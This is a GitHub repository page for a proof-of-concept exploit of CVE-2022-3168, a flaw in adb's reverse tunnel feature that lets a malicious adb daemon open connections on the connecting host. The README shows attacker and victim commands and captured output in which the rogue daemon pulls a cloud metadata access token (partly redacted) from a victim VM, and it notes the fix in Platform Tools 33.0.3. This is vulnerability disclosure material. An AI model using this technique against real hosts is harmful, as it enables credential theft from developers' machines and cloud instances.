Skip to content
/ CVE-2022-3168-adb-unexpected-reverse-forwards Public

Proof of concept code to exploit flaw in adb that allowed opening network connections on the host to arbitrary destinations

2 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

irsl/CVE-2022-3168-adb-unexpected-reverse-forwards

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
README.md
README.md
 
 
adb_rogue_daemon.py
adb_rogue_daemon.py
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

The reverse tunnel feature in Android Debug Bridge (adb) was vulnerable as it allowed malicious adb daemons to open connections to arbitrary host/ports and unix domain sockets on the host.

Attacker window (where the rogue daemon is running):

$ ./adb_rogue_daemon.py

Victim window (a GCE VM in this example):

$ adb connect serverip:5556
connected to 8.tcp.ngrok.io:19076

Attacker window:

...
Wooho, we got response for our rouge request!
b'HTTP/1.0 200 OK\r\nMetadata-Flavor: Google\r\nContent-Type: application/json\r\nDate: Thu, 04 Nov 2021 22:31:21 GMT\r\nServer: Metadata Server for VM\r\nConnection: Close\r\nContent-Length: 1049\r\nX-XSS-Protection: 0\r\nX-Frame-Options: SAMEORIGIN\r\n\r\n{"access_token":"ya29.c.KpgBFghLV[redacted].....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................'
<<< b'...................................................................................................................................................................................................................................................","expires_in":2394,"token_type":"Bearer"}CLSE\x08\x00\x00\x00\xd2\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbc\xb3\xac\xba'
b'...................................................................................................................................................................................................................................................","expires_in":2394,"token_type":"Bearer"}CLSE\x08\x00\x00\x00\xd2\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbc\xb3\xac\xba'
('....', (774778414, 774778414, 774778414, 774778414, 774778414), b'...........................................................................................................................................................................................................................","expires_in":2394,"token_type":"Bearer"}CLSE\x08\x00\x00\x00\xd2\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbc\xb3\xac\xba')

This was fixed in Platform Tools 33.0.3.

About

Proof of concept code to exploit flaw in adb that allowed opening network connections on the host to arbitrary destinations

Resources

Readme
Activity

Stars

2 stars

Watchers

2 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages